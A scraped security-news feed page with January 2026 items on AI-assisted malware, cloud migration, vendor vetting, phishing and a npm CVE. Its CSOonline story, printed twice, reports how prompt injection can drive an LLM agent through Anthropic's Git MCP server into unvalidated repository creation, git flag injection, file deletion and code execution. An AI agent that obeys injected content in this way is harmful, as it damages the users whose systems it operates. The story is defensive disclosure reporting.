VoidLink Linux Malware Framework Built with AI Assistance Reaches 88,000 Lines of Code

The recently discovered sophisticated Linux malware framework known as VoidLink is assessed to have been developed by a single person with assistance from an artificial intelligence (AI) model. That's according to new findings from Check Point Research, which identified operational security blunders by malware's author that provided clues to its developmental origins. The latest insight makesView the full article

• 0 comments
• 49 views

Hacker News

January 21Jan 21

The Dual Engine of Digital Transformation: Mastering AWS Cloud Migration and Proactive Vulnerability Management

The Dual Engine of Digital Transformation: Mastering AWS Cloud Migration and Proactive Vulnerability Management

In the modern business era, the mandate is clear: innovate or become obsolete. For most enterprises, this innovation is fueled by the cloud. However, as organizations transition from legacy on-premise hardware to the elastic, high-performance world of Amazon Web Services (AWS), they face a dual challenge. First, the technical complexity of migrating massive datasets without disrupting operations; and second, the ever-evolving threat landscape that views cloud adoption as a new surface for attack.
To thrive, businesses must view Cloud Migration and Cybersecurity not as separate IT tasks, but as two sides of the same coin. By leveraging expert AWS cloud Migration Services and rigorous vulnerability management cyber security, companies can build a digital foundation that is both agile and impenetrable.
Part I: The Strategic Shift—AWS Cloud Migration
Migration is more than a simple “copy-paste” of data. It is a fundamental shift in how a business consumes technology. AWS offers a vast ecosystem of over 200 services, but unlocking that potential requires a structured approach.
1. The 6 R’s of Migration Strategy
Before a single byte is moved, architects must determine the fate of every application. This is typically categorized by the “6 R’s”:
Rehost (Lift-and-Shift): Moving applications to the cloud without modification. This is the fastest way to exit a physical data center. Replatform (Lift-and-Reshape): Making minor optimizations to take advantage of cloud features without changing the core code. Refactor / Re-architect: Reimagining how an application is built using cloud-native features like serverless computing (AWS Lambda). Repurchase: Moving to a different product, often a SaaS platform. Retire: Decommissioning applications that are no longer useful. Retain: Keeping certain applications on-premise due to compliance or latency needs. 2. Overcoming Migration Hurdles with Opsio
Modern migration services, such as those provided by Opsio, focus on reducing the friction of this transition. The primary goal is to maintain Business Continuity.
Using the AWS Application Migration Service (MGN), businesses can automate the conversion of physical, virtual, or cloud-based servers to run natively on AWS. This minimizes manual errors and ensures that the “cutover” period—the moment you switch from the old system to the new—is measured in minutes rather than days.
3. The Economic Impact: From CapEx to OpEx
One of the most compelling reasons for AWS migration is the financial transformation. In a traditional setup, businesses must guess their peak capacity and buy expensive hardware upfront (Capital Expenditure). On AWS, you move to Operational Expenditure, paying only for what you use. Migration services help implement “Right-Sizing,” ensuring you aren’t paying for a 64GB RAM server when your application only uses 8GB.
Part II: Securing the New Frontier—Vulnerability Management
The cloud operates on a Shared Responsibility Model. AWS is responsible for the security of the cloud (the physical data centers, cables, and global infrastructure). However, you are responsible for security in the cloud—your data, your applications, and your user permissions.
As soon as an instance goes live on AWS, it becomes a target. This is where SeqOps’ Vulnerability Management becomes critical.
1. The Vulnerability Lifecycle
Cybersecurity is no longer a “set it and forget it” endeavor. Vulnerability management is a continuous cycle:
Discovery: Identifying every asset in your cloud inventory. You cannot protect what you cannot see. Assessment: Scanning these assets for known weaknesses (CVEs), misconfigurations, and weak passwords. Prioritization: Using risk scores to determine which vulnerabilities are “critical” (easily exploitable and high impact) versus “low” (theoretical risks). Remediation: Patching the software, changing the configuration, or blocking the vulnerable port. Verification: Running a follow-up scan to ensure the fix worked. 2. Server Security and Patch Management
In a cloud environment, servers are often “ephemeral”—they may exist for only a few hours to handle a spike in traffic. Traditional security tools struggle with this. Modern vulnerability management integrates directly with the cloud’s API to track these temporary servers.
Security services like SeqOps provide deep-visibility into the operating system layer. This ensures that even if a developer forgets to update a library in a custom application, the system flags the risk immediately, preventing a potential data breach.
3. Compliance and Governance
For industries like finance, healthcare, and e-commerce, migration is not just a technical challenge but a legal one. Frameworks like GDPR, HIPAA, and PCI DSS require strict proof that data is being handled securely. Automated vulnerability scanning provides the audit trails necessary to prove compliance to regulators, saving hundreds of hours in manual documentation.
Part III: The Synergy—Why Migration and Security Must Co-Exist
A common mistake companies make is treating security as a post-migration “add-on.” This leads to “security debt,” where the cloud environment is so cluttered with holes that it becomes more expensive to fix than it was to build.
1. Security by Design
By integrating SeqOps during the Opsio migration process, organizations can achieve Security by Design. This means:
Hardened Images: Only using pre-secured, patched versions of operating systems. Least Privilege Access: Ensuring no user or application has more access than it absolutely needs. Infrastructure as Code (IaC) Scanning: Checking the scripts that build your cloud for security flaws before they are even deployed. 2. Faster Incident Response
When your migration is well-documented and your vulnerability management is automated, your “Mean Time to Repair” (MTTR) drops significantly. If a new global threat (like Log4j) emerges, a company with an integrated strategy can identify every affected server in their AWS environment within minutes and deploy a patch across the entire fleet simultaneously.
Conclusion: Investing in Resilience
The journey to the cloud is a marathon, not a sprint. Success is defined by how well you can balance the speed of migration with the stability of your security posture.
By partnering with experts like Opsio for the technical migration and SeqOps for ongoing vulnerability management, you create a resilient digital ecosystem. You gain the freedom to innovate on the world’s leading cloud platform, backed by the peace of mind that your data, your customers, and your reputation are shielded from the threats of the digital age
View the full article

• 0 comments
• 46 views

reporter

January 21Jan 21

13 cyber questions to better vet IT vendors and reduce third-party risk

13 cyber questions to better vet IT vendors and reduce third-party risk

Increased reliance on IT service providers, digital tools, and third-party software is greatly expanding the enterprise attack surface, with noteworthy cyberattacks over the past year underscoring this fact. 
In October 2025, Marks & Spencer terminated its longtime helpdesk deal with outsourcing giant Tata Consultancy Services following a cyberattack that cost the British retailer an estimated £300 million and temporarily shut down its online business.
In August, a Chinese threat group leveraged compromised OAuth tokens from third-party platform Salesloft Drift to exfiltrate sensitive business data — AWS keys, Snowflake tokens, passwords — from as many as 700 organizations. This came on the heels of a wave of attacks in which cybercriminal gang ShinyHunters pretended to be IT support personnel to trick users into connecting to malicious versions of Salesforce’s Data Loader, which was then used to exfiltrate data from Salesforce environments. All told, 1.5 billion Salesforce records were claimed to have been stolen.
And, back in April, a critical zero-day vulnerability in SAP NetWeaver, one of the most widespread incidents involving an ERP platform, illustrated that enterprise software has become a prime target for attackers because their compromise directly impacts the revenue, operations, and reputation of an organization.
“Adversaries continue to exploit the path of least resistance, increasingly targeting third-party providers and human vulnerabilities to bypass technical controls,” says Casey Corcoran, field CISO at Stratascale, the cybersecurity division of SHI International. “By compromising trusted vendors, attackers can move undetected for longer periods, exploiting established access points across multiple organizations.”
Because these are newer avenues for attack, companies have been caught on their heels. “We don’t have enough preparation or defensive tools to rapidly detect and defend against these attacks, leading to a significant level of risk for lots of companies,” says Joshua Wright, faculty fellow of the SANS Institute and technical director at Cyber Hack Challenges.


John Alford, CSO at TeraType, an adviser to pharmaceutical, financial, and SaaS firms on cybersecurity, compliance, audit and AI governance, says legacy mindsets are also to blame.
“Many organizations still defend their environments as if threats march up to the front gate when in reality the most effective attackers slip in through the service corridors that nobody monitors,” Alford says. “The Marks & Spencer situation proved this: A help desk workflow became a quiet passage into production because it relied on trust by default.” There appeared to be no strong caller verification processes, no step-up checks, and no guardrails on what support staff could change, he adds.
The Salesforce ecosystem breaches demonstrate another common blind spot: Once attackers capture a token or exploit a permissive integration, they gain the full authority of a trusted insider. “Companies that rely on perimeter controls and MFA alone never see this risk because they are not watching the right places,” Alford says.
The CSO’s role in vetting IT vendors
Cyber obligations are already written into IT services and SaaS contracts, but “there are limits to what companies can do,” says Stephen Lilley, partner at law firm Mayer Brown. “Companies are unlikely to be able to impose cyber requirements that go beyond what is commonly seen in the relevant market. And even sophisticated companies still experience cyber incidents — meaning that IT providers, like their customers, are unable to entirely eliminate the risk from these attacks.”
Although risk eradication is not possible, better mitigation is. Here, CSOs can play a crucial role.
“CSOs are uniquely able to see across the full business process — data flows, dependencies, and downstream impact — but many organizations still don’t use that perspective to reassess third-party risk as reliance grows,” says Randy Gross, CISO for CompTIA. “Cross-functional collaboration is a core CSO imperative: partnering early with procurement, legal, IT, and business leaders so security, resilience, and exit risk are designed in, not bolted on.”
When engagements are initiated at the business-unit level or come in below financial approval thresholds, CSOs may not even be aware of them.
“In many organizations, security leaders are brought in only after a contract is executed or — worse — after a security issue arises,” says Melissa Ventrone, leader of law firm Clark Hill’s cybersecurity, data protection, and privacy practice. “They should be involved … [and] their involvement does not need to slow the contracting process.”
In fact, CSOs can act as a “pragmatic technology advisor” says CompTIA’s Gross, seeking critical information they are uniquely qualified to assess.
Vital vendor questions CISOs should ask
To gain that critical information, security leaders and experts recommend CSOs ask IT partners the following cyber-specific questions.
1. What attestation will you provide to prove proper security controls are in place?
These are essential, says Juan Pablo Perez-Etchegoyen, CTO for cybersecurity and compliance platform Onapsis. Some of the most commonly used include:
SOC 2 Type II Report: considered the gold standard audit for IT and cloud service providers ISO/IEC 27001 certification: an international standard for information security Cloud Security Alliance STAR: a registry specific to cloud providers that combines ISO 27001 with a controls matrix for cloud-related risks Industry-specific attestations: for example, HIPAA/HITRUST for handling healthcare data, or PCI DSS for storing or processing credit card data. 2. How do you maintain and update cybersecurity controls over time, and how will we be notified of material changes?
Would-be clients should have IT partners complete a detailed due diligence questionnaire and contractually obligate them to notify the company of any material changes that would require updates to their responses, advises Clark Hill’s Ventrone.
“At a minimum, IT vendors should be prohibited from changing security controls that would decrease the security, protection, or resiliency of its systems and company data,” she says.
3. Who on your team is capable of altering our identity posture, and what prevents a social engineered request from triggering that action?
CSOs can begin with general access inquiries: what access the provider’s team has to customer systems and data, and how that access is segmented and secured, Stratascale’s Corcoran says. Access should be limited by role, with least privilege enforced and multifactor authentication, single sign-on, and network segmentation in place.
Look for “logged, monitored, and immediately revocable access — ideally aligned with access control best practices from the NIST RMF function, which emphasizes least privilege and separation of duties,” Corcoran says.
Then CSOs can get specific. “Many clients focus on firewalls, endpoint agents, and MFA while overlooking the trust pathways that attackers prefer to use,” Alford says. Help desk workflows, OAuth integrations, supplier support portals, and automation connectors typically get less scrutiny even though they can alter identity states or extract large volumes of data with a single action.
CSOs should look for strictly defined role scopes, multi-step verification, step-up authentication, and approval chains for credential resets. “Anything short of that signals a blind spot that no amount of technical hardening will cover,” says Alford.
4. How can we verify the workflows you use when onboarding, offboarding, or resetting access, and can you show evidence of how these workflows performed last quarter?
Many companies underestimate how much operational trust they blindly hand over to providers. IT partners should offer workflow maps, execution logs, and testing records, not just policy documents.
“The most significant gaps appear in the places people assume are safe. I have seen mature organizations with strong 27001 programs, disciplined PCI controls, and well-run internal security teams fall to issues that lived entirely inside vendor workflows,” Alford notes. “Help desk resets, poorly scoped automation tokens, and inherited admin rights all surfaced in post-incident reviews as quiet pathways that no one had modeled.”
Risk assessments should focus not just on servers and networks but identity workflows and human-operated processes as well. “When you widen the lens, you often discover controls that look strong on paper but behave differently in practice,” Alford says.
5. What independent testing do you conduct, and how often is it performed?
IT partners should have a third party run security tests and assessments, and provide copies or executive summaries of these vulnerability scans, penetration tests, and other audits at least annually and whenever there are material changes to their network, infrastructure, or security controls, Clark Hill’s Ventrone says.
ThreatLocker CEO Danny Jenkins stresses frequency: “Threats are always evolving, so a once-a-year audit is not sufficient. All systems should be undergoing regular penetration testing and improvement.” 
6. Can you list every OAuth integration and privileged API relationship in your service and explain how each is scoped, rotated, monitored, and revoked?
“OAuth integrations are often treated as harmless conveniences rather than high-privilege conduits,” Alford explains. “In reality, they function like a network of forgotten tunnels. They bypass the front gate entirely and connect systems deep inside the environment.”
Companies should ask service partners to provide a token inventory, minimal scopes, finite lifetimes, and behavioral monitoring. Broad or permanent tokens are red flags, signaling elevated risk.
7. If an attacker abused one of your processes without breaching your systems, what are your contractual and operational commitments?
“These agreements often hand providers the practical ability to alter identity states, access sensitive data, or operate parts of the production environment. That level of delegated trust deserves the same scrutiny as hiring a senior operations leader,” says Alford. “When providers can reset passwords or manage OAuth integrations, the contract becomes a control document. It defines how risk will be shared and what evidence the client can demand.”
Without CSO involvement, contractual clauses are usually weak. “They focus on uptime rather than security, and they rarely require the provider to support strong authentication, tamper-evident logging, or event-level transparency,” Alford adds. Clients should insist on obligations tied to process compromise, not just system compromise.
8. What controls govern your staff’s activity in our environment, and how would we detect if a privileged session deviated from expected behavior?
“Modern attacks flow through trust relationships and soft operational processes,” Alford points out. “They exploit the places where no one expects danger — like help desks.”
As a result, controls on vendor staff behavior and detection of deviations are critical. Companies should insist on session recording, real-time alerts, and segregation of duties, Alford advises.
“Rapid detection and revoking access can make all the difference in an incident,” Onapsis’ Perez-Etchegoyen adds. Continuous application-level monitoring, clear incident response procedures, and the ability to immediately disable users or integrations are key.
9. How will you isolate our assets and data from other customers — including identity separation, automation boundaries, and admin segregation?
CSOs should seek architectural clarity and concrete mechanisms that limit blast radius, says Alford. They should also ask how the IT partner manages the cybersecurity risks posed by their value chains of vendors and subcontractors.
“IT partners should have a robust vendor management program and conduct appropriate due diligence on their own service providers,” advises Ventrone.
10. How quickly will you notify us of a security incident that impacts our data or systems?
“The biggest gains come from simple steps,” says CompTIA’s Gross, including gaining clarity on how incidents are disclosed and outages are handled.
CSOs should look for guaranteed notification within 24 to 72 hours, a tested incident response plan, and clearly defined breach reporting timelines and responsibilities written into the contract, says Stratascale’s Corcoran.
When an incident occurs, “IT partners should provide customers with sufficient information to perform their own threat analysis,” Alford says. “If an IT partner doesn’t provide the insight needed to identify attacks against their customers, then customer organizations can only rely on the detection and reporting capabilities of the hosting provider.”
11. How do you identify, prioritize, and remediate vulnerabilities?
Review of IT partner’s patching policies and remediation timelines should never be overlooked, as many cyberattacks exploit known vulnerabilities. “Slow patch cycles lead to supply chain disruptions, business operational issues, and even bankruptcy in some cases,” says Perez-Etchegoyen, who emphasizes SLAs related to critical patches and proof that fixes are validated.
Ventrone gives the example of a company that outsourced firewall management to a vendor. After a vulnerability in the firewall was exploited, the vendor ended up restoring the vulnerable version, resulting in a second compromise. In another example, a client found out that its IT partner, which had experienced a ransomware attack through its VPN, patched just once a month.
“I literally could not believe this was considered sufficient,” Ventrone says.
12. Do you carry enough cyber insurance to cover the impact to all your customers?
“We’re going to see a lot more attacks against SaaS providers,” says SANS Institute’s Wright. “Attackers have lots of motive here since the access obtained when a SaaS provider is compromised is significant, with lots of subsequent opportunity for ransomware, extortion, and direct harassment attacks against customers.”
Ventrone says clients should confirm their provider’s policy covers not only themselves but the full impact of a multi-customer incident.
13. Can we test your processes?
Attestations regarding cybersecurity testing and monitoring — such as regular penetration testing, 24/7/365 security monitoring, threat hunting — are essential, Wright says.
But Alford recommends going a step further. “Lots of firms do questionnaire-based reviews that confirm policies exist but rarely test how provider processes work in practice. They assume a support vendor has strong verification steps. They assume an integration partner follows least privilege. They assume a SaaS platform has adequate logging for delegated access,” says Alford, warning against presumptions.
“Verification through evidence, realistic scenarios, and process testing changes everything,” he says. “It exposes where risk actually lives and gives you the ability to design controls that match how attackers think rather than how documentation reads.”
Ongoing diligence necessary
“Recent incidents underscore that many organizations are not adequately managing third-party risk over the full lifecycle of their IT provider relationships,” notes Clark Hill’s Ventrone, adding that too often due diligence is treated as a one-time exercise, with insufficient ongoing oversight to ensure that security controls and procedures remain appropriate as systems evolve.
Stratascale’s Corcoran also notes that cyber due diligence often falls through the cracks. “Many client organizations still fall short in managing third-party risk because it’s often treated as a collateral duty, split between procurement and general risk functions rather than a dedicated, optimized process,” he says. “As a result, business stakeholders remain unsatisfied and critical risks go unmitigated, even as attackers increasingly exploit weaker links in the supply chain.”
Increasingly, partners in the IT ecosystem are being seen by cybercriminals to be those weaker links.
View the full article

• 0 comments
• 49 views

CSOonline

January 21Jan 21

LastPass Warns of Fake Maintenance Messages Targeting Users’ Master Passwords

LastPass Warns of Fake Maintenance Messages Targeting Users’ Master Passwords

LastPass is alerting users to a new active phishing campaign that's impersonating the password management service, which aims to trick users into giving up their master passwords. The campaign, which began on or around January 19, 2026, involves sending phishing emails claiming upcoming maintenance and urging them to create a local backup of their password vaults in the next 24 hours. TheView the full article

• 0 comments
• 56 views

Hacker News

January 21Jan 21

For cyber risk assessments, frequency is essential

For cyber risk assessments, frequency is essential

From a certain age, many people regularly visit their doctor for check-ups. In this way, risks and dangers can be identified early and appropriate measures taken.
The same applies to cybersecurity: Regular risk assessments help security teams identify vulnerabilities and areas for improvement. Unfortunately, such assessments are not carried out universally.
Advantages of a cyber risk assessment
CISOs benefit from the following advantages when they integrate cybersecurity risk assessments into their work:
Identifying vulnerabilities: A cyber risk assessment helps to identify security gaps in a company’s IT infrastructure, networks, and systems. This provides the opportunity to eliminate these vulnerabilities before they can be exploited by cybercriminals. Prioritize risk management measures: Not every system is critical, and not all of a company’s data is equally important. The results of the risk assessment clarify which assets and systems are most critical and at the highest risk of attack. Based on this, security managers can prioritize their measures and thus allocate their resources more effectively to address the most critical risks first. Meeting compliance requirements: Almost every company must comply with various data protection and data security regulations, such as the GDPR or the Payment Card Industry Data Security Standard (PCI DSS). Many of these legal requirements explicitly demand specific risk assessments, such as a data protection impact assessment under the GDPR. Risk assessments help to meet the compliance requirements of various regulations. This ensures that the necessary security standards are met and that potential fines or legal consequences for violations are avoided. Make smart decisions and reduce costs: Cyber ​​risk assessments give companies a comprehensive understanding of their cyber risks. This allows them to make informed decisions about risk mitigation strategies, thereby reducing the likelihood of a successful and costly cyberattack. Furthermore, it enables them to make targeted and therefore more effective investments in their cybersecurity. A look at data risk
The target of most cyberattacks is a company’s data — with enormously costly consequences: According to IBM’s Cost of a Data Breach Report 2025, a data breach caused an average of $4.44 million in damages. Therefore, it is crucial to take a close look at data and the risks it faces.
This is all the more important because, unlike infrastructure and other systems, data is not “uncompromising.” Servers can be reconfigured, cloud instances rebuilt. But once stolen, data remains in the hands of cybercriminals. Backups offer no protection against this.
An analysis of nearly 10 billion cloud objects, conducted as part of data risk assessments at more than 700 companies across various industries worldwide, reveals the risks that data is generally exposed to. According to the analysis, one in 10 data sets in the cloud is accessible to all employees. This creates an internal radius that significantly increases the potential damage from a ransomware attack.
However, a lack of multifactor authentication (MFA) also makes it easier for attackers to compromise internally exposed data: Microsoft has found that more than 99% of compromised accounts do not have MFA.
Conclusion
These general findings already highlight the biggest problem areas. Nevertheless, it is important to determine the individual data risk and identify weaknesses within the framework of a data risk assessment.
Companies typically don’t know what data they possess, where it’s stored, or who has access to it. Only with this fundamental information can they identify their risks and take targeted measures. The time investment is manageable, at around two to four hours, and a comprehensive report provides immediately actionable recommendations. Furthermore, the assessment process often uncovers additional security issues, ranging from ongoing cyberattacks to Kerberos passwords that are up to 15 years old.
Regularly conducted cyber risk assessments allow for clear and verifiable documentation of progress in data security — also for management. CISOs finally have a tool at their disposal that makes their cybersecurity successes visible.
View the full article

• 0 comments
• 34 views

CSOonline

January 21Jan 21

CERT/CC Warns binary-parser Bug Allows Node.js Privilege-Level Code Execution

CERT/CC Warns binary-parser Bug Allows Node.js Privilege-Level Code Execution

A security vulnerability has been disclosed in the popular binary-parser npm library that, if successfully exploited, could result in the execution of arbitrary JavaScript. The vulnerability, tracked as CVE-2026-1245 (CVSS score: N/A), affects all versions of the module prior to version 2.3.0, which addresses the issue. Patches for the flaw were released on November 26, 2025. Binary-parser is aView the full article

• 0 comments
• 51 views

Hacker News

January 21Jan 21

Third Party Risk Management: So vermeiden Sie Compliance-Unheil

Third Party Risk Management: So vermeiden Sie Compliance-Unheil

Third Party Risk Management hilft Unternehmen, das Risiko von Compliance-Verstößen zu vermeiden.
Foto: Diyajyoti – shutterstock.com
In Zeiten der Digitalisierung ist es für Unternehmen unerlässlich, auf die Unterstützung von Drittanbietern zurückzugreifen. Sei es im Bereich der IT-Infrastruktur oder bei der Datenverarbeitung – externe Dienstleister helfen dabei, Geschäftsprozesse effektiver und effizienter zu gestalten. Doch mit der Zusammenarbeit mit Dritten geht auch ein Risiko einher. Unternehmen sollten deshalb ein Third Party Risk Management (TPRM) etablieren.
Was ist Third Party Risk Management?
TPRM ist ein strategischer Ansatz, der darauf abzielt, das Risiko der Zusammenarbeit mit Drittanbietern zu identifizieren, zu bewerten und zu steuern. Er hilft Unternehmen, die Risiken im Zusammenhang mit ihren Drittanbietern besser zu verstehen und zu managen, um Compliance-Verstöße zu vermeiden.
Warum ist TPRM wichtig? “Unternehmen müssen beispielsweise überprüfen, ob ihre Drittanbieter den SOC2-Prüfungsstandard einhalten. Dieser soll sicherstellen, dass Drittanbieter sensible Kundendaten vor unbefugtem Zugriff schützen”, erklärt GreenPages-Manager Pasteris und ergänzt: “Auch Datenschutzgesetze wie die DSGVO sind in dieser Hinsicht relevant. Wenn Sie selbst compliant sind, nutzt Ihnen das überhaupt nichts, wenn Ihr Drittanbieter sich an nichts hält.”
Lesetipp: 5 Wege, mit Drittanbietern unterzugehen
Kernkomponenten einer effektiven TPRM-Strategie
Ein Thrid Party Risk Managment sollte Folgendes enthalten:
Risikoidentifikation und -bewertung: Der erste Schritt im TPRM-Prozess ist die Identifikation und Bewertung der Risiken, die mit der Zusammenarbeit mit Drittanbietern verbunden sind. Dies umfasst die Analyse der Sicherheitsmaßnahmen, Datenschutzpraktiken und Compliance-Standards der Drittanbieter. Unternehmen sollten eine detaillierte Due Diligence durchführen, um potenzielle Schwachstellen und Risiken zu identifizieren.
Vertragsmanagement: Ein weiterer wichtiger Aspekt des TPRM ist die Implementierung von Vertragsklauseln, die die Verantwortlichkeiten der Drittanbieter hinsichtlich Compliance-Verstößen definieren. Es ist wichtig, dass Unternehmen klare Erwartungen an ihre Drittanbieter haben und dass diese Erwartungen in schriftlicher Form niedergelegt werden. Dies hilft Unternehmen, sich vor rechtlichen Konsequenzen im Falle von Compliance-Verstößen durch Drittanbieter zu schützen.
Überwachung und Audits: Eine effektive TPRM-Strategie umfasst auch die kontinuierliche Überwachung von Drittanbietern, um sicherzustellen, dass sie weiterhin den Anforderungen entsprechen. Diese kann durch regelmäßige Audits und Prüfungen erfolgen. Unternehmen sollten sicherstellen, dass sie über die notwendigen Ressourcen und Tools verfügen, um die Einhaltung der Compliance-Standards durch ihre Drittanbieter zu überprüfen.
Schulung und Sensibilisierung: Die Schulung und Sensibilisierung der Mitarbeiter über die Risiken und Anforderungen des TPRM ist ebenfalls entscheidend. Mitarbeiter sollten verstehen, warum TPRM wichtig ist und wie sie dazu beitragen können, die Risiken zu minimieren. Regelmäßige Schulungen und Workshops können dazu beitragen, das Bewusstsein für TPRM zu stärken und sicherzustellen, dass alle Mitarbeiter die Compliance-Standards einhalten.
Best Practices für ein erfolgreiches TPRM
Diese vier Tipps helfen bei der TPRM-Umsetzung:
Etablierung klarer Richtlinien und Verfahren: Unternehmen sollten klare Richtlinien und Verfahren für das TPRM entwickeln und implementieren. Diese sollten alle Aspekte des TPRM abdecken, einschließlich der Auswahl von Drittanbietern, der Vertragsgestaltung, der Überwachung und der Berichterstattung.
Nutzung von Technologie: Der Einsatz von Technologie kann das TPRM erheblich erleichtern. Es gibt zahlreiche Tools und Plattformen, die Unternehmen dabei unterstützen, die Risiken zu identifizieren, zu bewerten und zu überwachen. Diese Tools können auch bei der Automatisierung von Audits und Berichterstattungen helfen.
Integration des TPRM in das Enterprise Risk Management (ERM): Das TPRM sollte nicht isoliert betrachtet werden, sondern in das umfassende Risikomanagement des Unternehmens integriert werden. Dies stellt sicher, dass alle Risiken, einschließlich derjenigen, die von Drittanbietern ausgehen, ganzheitlich betrachtet und gemanagt werden.
Regelmäßige Überprüfung und Aktualisierung: Die TPRM-Strategie sollte regelmäßig überprüft und bei Bedarf aktualisiert werden, um sicherzustellen, dass sie den aktuellen Bedrohungen und Compliance-Anforderungen entspricht. Unternehmen sollten proaktive Maßnahmen ergreifen, um ihre TPRM-Strategie kontinuierlich zu verbessern.
Sichere Geschäftsprozesse mit TPRM
Third Party Risk Management ist ein wesentlicher Bestandteil der Compliance-Strategie jedes Unternehmens, das mit Drittanbietern zusammenarbeitet. Durch die Implementierung einer effektiven TPRM-Strategie können Unternehmen das Risiko von Compliance-Verstößen durch Drittanbieter minimieren und sich vor rechtlichen Konsequenzen schützen. Die Identifikation und Bewertung von Risiken, das Vertragsmanagement, die kontinuierliche Überwachung und die Schulung der Mitarbeiter sind entscheidende Komponenten eines erfolgreichen TPRM. (jm)
Sie möchten regelmäßig über wichtige Themen rund um Cybersicherheit informiert werden? Unser kostenloser Newsletter liefert Ihnen alles, was Sie wissen müssen.
View the full article

• 0 comments
• 33 views

CSOonline

January 21Jan 21

Three vulnerabilities found in Anthropic Git MCP Server could let attackers tamper with LLMs

Three vulnerabilities found in Anthropic Git MCP Server could let attackers tamper with LLMs

Threat actors could use prompt injection attacks to take advantage of three vulnerabilities in Anthropic’s official Git MCP server and cause mayhem with AI systems.
This alert comes from researchers at Israel-based Cyata, which urges infosec leaders to make sure corporate developers using the official GIT MCP server update to the latest version as soon as possible.
The risk is that an attacker could run unapproved code or tamper with a large language model (LLM), compromising its output.
While the official Git MCP server can be exploited on its own, “the toxic combination is when both the Git MCP server and a Filesystem MCP server are enabled,” Cyata CEO Shahar Tal said in an interview. “Then that [AI] agent is at critical risk. We urge people to use the latest versions [of both applications].”
At risk are developers using mcp-server-git versions prior to 2025-12.18.
The three vulnerabilities are
·CVE-2025-68143, an unrestricted git_init. ·CVE-2025-68145, a path validation bypass. ·CVE-2025-68144, an argument injection in git_diff. Unlike other vulnerabilities in MCP servers that required specific configurations, these work on any configuration of Anthropic’s official server, out of the box, Cyata says.
Model Context Protocol (MCP) is an open standard introduced by Anthropic in 2024 to provide a unified way for AI assistants (such as Claude Desktop, Cursor, Windsurf, and others) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.
MCP servers expose capabilities to the AI, acting as a bridge between the LLM and external systems.
As Cyata points out in its blog, MCP servers execute actions based on LLM decisions. If an LLM can be manipulated through prompt injection, a threat actor can influence the AI’s context to trigger MCP tool calls with attacker-controlled arguments.
Since Anthropic released its model, thousands of vendors and third party providers have released official MCP servers. There are also unofficial servers for online platforms like LinkedIn. And, as might be expected, there are dodgy MCP servers circulating from crooks.
Related content: What CISOs need to know about securing MCP servers
It isn’t known how many enterprise developers use mcp-server-git, the official Git MCP server maintained by Anthropic. Nor is it known how many also use Filesystem MCP Server.
Cyata researcher Yarden Porat first discovered that if a tool is called in mcp-server-git, the server will use the path it is given without validation, so an attacker could create a new git repository with malicious content that could be read by the LLM.
The second hole is in a parameter that gets passed directly to the git command line without sanitization. That means a threat actor can inject any git flag, including one that could overwrite a target file. Third, it was discovered that an attacker could also delete files. Finally, researchers found that attackers could use git’s smudge and clean filters to run code.
“All you have to know — and it depends on the agent you’re attacking — is how to get the [AI] agent to read something you control,” said Tal. “That is quite widespread. It’s a very wide attack surface.”
Related content: Top 10 MCP vulnerabilities
Cyata says defensive action not only means updating mcp-server-git to version 2025.12.18 or later, but also auditing which MCP servers run together. Combining Git + Filesystem increases the attack surface, the researchers say.
Admins should also monitor for unexpected .git directories in non-repository folders.
“Generally, it is very hard to protect against vulnerabilities in MCP servers,” said Tal. “Most assistant type agents don’t even let you sanitize parameters. Homegrown agents could include various prompt injection defenses, but none are fail-proof.”
Cyata says it informed Anthropic of the first problem through the bug reporting service HackerOne on June 24, 2025. It was marked by Anthropic as informative. After Cyata reported the prompt injection issue, Anthropic took another look, but it wasn’t until September 10 that the report was accepted. The new version of Git MCP Server was released December 18.
In an interview, Porat suggested there wasn’t much that infosec leaders or developers could have done between the discovery of the vulnerability and the release of the more secure version of Git MCP Server. A prompt injection attack would work on the unpatched version even in its most secure configuration, he said.
“You need guardrails around each [AI] agent and what it can do, what it can touch,” Tal added. “You need to also, if there is an incident, be able to look back at everything the agent did.”
The problem with MCP servers is that they give the LLM access to execute sensitive functions, commented Johannes Ullrich, dean of research at the SANS Institute. “How much of a problem this is depends on the particular features they have access to. But once an MCP server is configured, the LLM will use the content it receives to act on and execute code (in this case, in git).
“Sadly, it is very unlikely that this will be the last time we see a prompt injection in this system. There is no simple fix for prompt injections, and usually you are going to create band-aids to prevent specific exploits. For an MCP server like this, the best option is to restrict the data it operates on, so it uses only data from trusted sources, and the functionality it can access. Some fine-grained access control can be used to implement this.”
Tanya Janca, a Canadian-based secure coding trainer, said to mitigate potential issues, development teams using MCP should limit access and privileges for MCP servers — no root, read-only access, local access only — and only give users the least privileges they need. Admins should validate file paths completely, not just prefix matching, resolve symlinks properly and always perform careful input validation and use parameterized queries. 
View the full article

• 0 comments
• 40 views

CSOonline

January 21Jan 21

Three vulnerabilities in Anthropic Git MCP Server could let attackers tamper with LLMs

Three vulnerabilities in Anthropic Git MCP Server could let attackers tamper with LLMs

Threat actors could use prompt injection attacks to take advantage of three vulnerabilities in Anthropic’s official Git MCP server and cause mayhem with AI systems.
This alert comes from researchers at Israel-based Cyata, which urges infosec leaders to make sure corporate developers using the official GIT MCP server update to the latest version as soon as possible.
The risk is that an attacker could run unapproved code or tamper with a large language model (LLM), compromising its output.
While the official Git MCP server can be exploited on its own, “the toxic combination is when both the Git MCP server and a Filesystem MCP server are enabled,” Cyata CEO Shahar Tal said in an interview. “Then that [AI] agent is at critical risk. We urge people to use the latest versions [of both applications].”
At risk are developers using mcp-server-git versions prior to 2025-12.18.
The three vulnerabilities are
·CVE-2025-68143, an unrestricted git_init. ·CVE-2025-68145, a path validation bypass. ·CVE-2025-68144, an argument injection in git_diff. Unlike other vulnerabilities in MCP servers that required specific configurations, these work on any configuration of Anthropic’s official server, out of the box, Cyata says.
Model Context Protocol (MCP) is an open standard introduced by Anthropic in 2024 to provide a unified way for AI assistants (such as Claude Desktop, Cursor, Windsurf, and others) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.
MCP servers expose capabilities to the AI, acting as a bridge between the LLM and external systems.
As Cyata points out in its blog, MCP servers execute actions based on LLM decisions. If an LLM can be manipulated through prompt injection, a threat actor can influence the AI’s context to trigger MCP tool calls with attacker-controlled arguments.
Since Anthropic released its model, thousands of vendors and third party providers have released official MCP servers. There are also unofficial servers for online platforms like LinkedIn. And, as might be expected, there are dodgy MCP servers circulating from crooks.
Related content: What CISOs need to know about securing MCP servers
